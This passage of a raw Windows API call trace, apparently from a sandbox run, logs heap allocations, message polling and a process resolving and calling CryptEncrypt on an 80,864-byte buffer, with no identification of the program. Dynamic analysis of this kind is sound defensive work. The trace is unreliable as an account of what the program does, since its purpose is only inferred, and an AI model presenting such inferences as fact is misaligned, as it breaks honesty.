lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0258.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa328, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0258.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.288] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0258.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6c10 [0258.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0258.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0258.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0258.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0258.290] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x13bd9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x13be0) returned 1 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.293] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.294] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.295] CharLowerBuffW (in: lpsz="byte[80864]", cchLength=0xb | out: lpsz="byte[80864]") returned 0xb [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0258.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.296] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.296] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.297] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.297] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.297] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.297] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0258.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.298] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c5e38*, pdwDataLen=0x8bef68*=0x13bd9, dwBufLen=0x13be0 | out: pbData=0x34c5e38*, pdwDataLen=0x8bef68*=0x13be0) returned 1 [0258.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.300] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.300] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.302] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 